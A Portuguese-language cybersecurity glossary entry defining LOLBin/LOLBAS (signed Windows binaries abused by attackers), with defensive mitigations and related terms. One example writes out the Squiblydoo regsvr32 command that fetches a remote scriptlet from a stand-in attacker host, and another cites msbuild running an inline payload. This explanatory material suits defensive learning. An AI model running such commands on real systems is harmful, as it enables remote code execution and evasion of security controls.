LOLBin / LOLBAS
O que é LOLBin / LOLBAS?
LOLBin / LOLBASBinario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima.
O LOLBin (Living-Off-the-Land Binary) e o projeto mais amplo LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogam binarios, scripts e bibliotecas assinados pela Microsoft com efeitos secundarios uteis para operacoes ofensivas, como executar codigo arbitrario, descarregar payloads remotos ou contornar controlo de aplicacoes. Exemplos comuns incluem rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe e certutil.exe. Como cada ferramenta esta assinada e e confiavel, os defensores nao podem simplesmente bloquear por hash; tem de distinguir linhas de comandos esperadas de anomalas. Os LOLBAS suportam muitas tecnicas de execucao e evasao do MITRE ATT&CK. As mitigacoes baseiam-se em allow-listing de aplicacoes, logging de ScriptBlock e criacao de processos, regras ASR e analitica comportamental de EDR.
● Exemplos
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml para executar C# inline sem tocar no disco.
● Perguntas frequentes
O que é LOLBin / LOLBAS?
Binario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa LOLBin / LOLBAS?
Binario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima.
Como funciona LOLBin / LOLBAS?
O LOLBin (Living-Off-the-Land Binary) e o projeto mais amplo LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogam binarios, scripts e bibliotecas assinados pela Microsoft com efeitos secundarios uteis para operacoes ofensivas, como executar codigo arbitrario, descarregar payloads remotos ou contornar controlo de aplicacoes. Exemplos comuns incluem rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe e certutil.exe. Como cada ferramenta esta assinada e e confiavel, os defensores nao podem simplesmente bloquear por hash; tem de distinguir linhas de comandos esperadas de anomalas. Os LOLBAS suportam muitas tecnicas de execucao e evasao do MITRE ATT&CK. As mitigacoes baseiam-se em allow-listing de aplicacoes, logging de ScriptBlock e criacao de processos, regras ASR e analitica comportamental de EDR.
Como se defender contra LOLBin / LOLBAS?
As defesas contra LOLBin / LOLBAS costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para LOLBin / LOLBAS?
Nomes alternativos comuns: LOLBAS, Binario Living-off-the-Land.
● Termos relacionados
- attacks№ 616
Living off the Land
Estilo de ataque em que o adversario abusa de ferramentas e scripts legitimos ja instalados no sistema vitima em vez de implantar malware proprio.
- malware№ 417
Malware sem ficheiro
Malware que corre essencialmente em memória e tira partido de ferramentas legítimas do sistema, evitando executáveis tradicionais em disco.
- defense-ops№ 298
Evasão de Defesas
Tática MITRE ATT&CK (TA0005) que reúne técnicas usadas para evitar deteção, desativar ferramentas de segurança e ocultar a atividade do atacante no sistema alvo.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
Tecnologia de segurança de endpoint que regista continuamente atividade de processos, ficheiros, registo e rede para detetar, investigar e responder a ameaças nos hosts.
- defense-ops№ 682
Mimikatz
Ferramenta open source de pos-exploracao para Windows que extrai senhas em texto claro, hashes, tickets Kerberos e outras credenciais da memoria e do LSASS.
- attacks№ 045
Bypass de AMSI
Tecnicas que desativam, fazem patch ou contornam o Antimalware Scan Interface do Windows para que scripts e payloads em memoria nao sejam analisados pelos antivirus.